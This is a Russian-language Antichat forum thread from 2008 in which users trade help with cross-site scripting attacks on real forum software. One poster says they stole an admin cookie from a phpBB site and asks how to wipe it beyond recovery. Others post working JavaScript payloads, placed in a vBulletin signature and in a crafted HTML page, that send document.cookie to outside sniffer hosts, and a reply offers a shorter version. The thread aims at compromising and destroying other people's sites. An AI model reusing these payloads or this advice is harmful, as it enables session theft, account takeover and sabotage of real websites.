Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

12.11.2008, 10:24
|
|
Новичок
Регистрация: 23.09.2008
Сообщений: 1
Провел на форуме: 35048
Репутация:
1
|
|
У меня тоже вопрос...
То что он ламерский, я понимаю...
Ну, вот, я нашел XSS на phpbb, получил куки, расшифровал пароль...
Зашел в админку... А дальше?
В моем случае мне надо угробить "сайт". (удалить все темы, удалить всех пользователей или сделать чтобы он вообще исчез...)
Пропалюсь я или нет - меня не колышет...
Просто, если что, как нормальный человек, админ сразу напишет в техподдержку, попробует бэкап и прочие откаты назад...
Как сделать так, чтобы восстановить форум не предоставлялось возможным?
|
|
|

12.11.2008, 11:20
|
|
Members of Antichat
Регистрация: 03.09.2005
Сообщений: 594
Провел на форуме: 3606217
Репутация:
685
|
|
никак не сделаешь, если backup есть )
|
|
|

12.11.2008, 21:03
|
|
Новичок
Регистрация: 11.11.2008
Сообщений: 10
Провел на форуме: 16602
Репутация:
16
|
|
Сообщение от lawyer
У меня тоже вопрос...
То что он ламерский, я понимаю...
Ну, вот, я нашел XSS на phpbb, получил куки, расшифровал пароль...
Зашел в админку... А дальше?
В моем случае мне надо угробить "сайт". (удалить все темы, удалить всех пользователей или сделать чтобы он вообще исчез...)
Пропалюсь я или нет - меня не колышет...
Просто, если что, как нормальный человек, админ сразу напишет в техподдержку, попробует бэкап и прочие откаты назад...
Как сделать так, чтобы восстановить форум не предоставлялось возможным?
Еси хост предостовляет улуги автомотического бекапа то не как, а большенство хостов их предоставляет)
|
|
|

17.11.2008, 00:24
|
|
Участник форума
Регистрация: 07.11.2005
Сообщений: 166
Провел на форуме: 565212
Репутация:
111
|
|
Есть vBulletin 3.6.8.
Есть возможность использовать HMTL в подписи.
Что можно интересного сделать? 
|
|
|

18.11.2008, 00:56
|
|
Участник форума
Регистрация: 07.11.2005
Сообщений: 166
Провел на форуме: 565212
Репутация:
111
|
|
Ну раз интересного никто не посоветует, попробую просто пароли выведать. В подписи разместил скрипт
<script>img = new Image(); img.src = "http://domain.name/img.php?"+document.cookie;</script>
На сниффер приходять только bblastvisit, bblastactivity и bbthread_lastview (хмм). Хеша пароля нету, даже id юзера нету. Что за?
|
|
|
конвертер бд из vb в phpbb |

18.11.2008, 20:39
|
|
Banned
Регистрация: 10.04.2007
Сообщений: 244
Провел на форуме: 2582771
Репутация:
264
|
|
конвертер бд из vb в phpbb
помоги плиз найти конвертер бд из vb в phpbb
просто спалили нулл над как нить базу перенести в другой двиг желатель в phpbb
и ваще это реально с вб куда либо базу конвертировать?
|
|
|

18.11.2008, 20:47
|
|
Участник форума
Регистрация: 06.06.2008
Сообщений: 162
Провел на форуме: 3942177
Репутация:
244
|
|
http://www.phpbb.com/community/viewtopic.php?f=10&t=325692
google.com
|
|
|

18.11.2008, 21:21
|
|
Новичок
Регистрация: 18.11.2008
Сообщений: 7
Провел на форуме: 25855
Репутация:
0
|
|
XSS
У меня один вопрос.
Не как не могу получить долгожданные куки.
Кто в состоянии помочь мне в моей затеи.
Я не делаю просто запрос на картинку, я хочу внедрить сниффер в ХТМЛ документ сделаный мною, это для того что бы не какие фильтры не спасли.
Вот примерные наброски, но через этот способ мне приходит только инфа о IP, хосте,
тоесть всё кроме кукисов.
<html>
<head>
<title>"*******"</title>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=windows-1251">
</head>
<body>
<script language="JavaScript" type="text/javascript">
document.write("<img.src='http://na-s.ru/images/********_1.gif?' +document.cookie>");
document.title = "www.BU_GA_GA.ru";
window.status = "Пожалуйста подождите";
</script>
<body onload="LoadThisPage()";
<script language="JavaScript" type="text/javascript">
function LoadThisPage()
{
window.location.href = "http://na-s.ru/pictures/*********.jpg";
}
</script>
</body>
</html>
|
|
|

18.11.2008, 21:35
|
|
Banned
Регистрация: 06.01.2008
Сообщений: 413
Провел на форуме: 1301036
Репутация:
1334
|
|
NooB MC
А не проще зделать так?
Код:
<script language=JavaScript>
document.images[0].src="http://sniff/sniff?"+document.cookie
</script>
|
|
|

18.11.2008, 21:38
|
|
Новичок
Регистрация: 18.11.2008
Сообщений: 7
Провел на форуме: 25855
Репутация:
0
|
|
спасиба попробую, если что отпишусь.
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|